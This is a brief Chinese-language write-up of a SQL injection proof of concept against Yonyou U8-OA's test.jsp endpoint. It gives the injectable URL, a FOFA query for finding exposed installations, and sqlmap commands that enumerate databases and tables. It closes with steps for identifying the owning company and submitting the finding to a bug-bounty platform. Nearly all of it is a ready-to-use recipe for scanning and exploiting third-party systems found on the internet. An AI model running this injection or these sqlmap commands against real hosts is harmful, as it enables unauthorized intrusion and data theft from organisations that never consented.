1-漏洞POC
POC:http://IP:PORT/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
2-使用fofa搜索
title="用友U8-OA"
3-漏洞验证
打开fofa搜索到的资产,在url中拼接poc,使用sqlmap进行探测
sqlmap语句:
c:\sqlmap>sqlmap.py -u "http://ip:port/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))" -p "S1" --batch --dbs
探测出数据库:
探测数据表:
c:\sqlmap>sqlmap.py -u "http://ip:port/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))" -p "S1" --batch --D information_schema --tables
探测出表名:
4-通过ip反查域名、通过站长工具查询出域名归属公司,通过天眼查查询公司详细信息,提交到漏洞盒子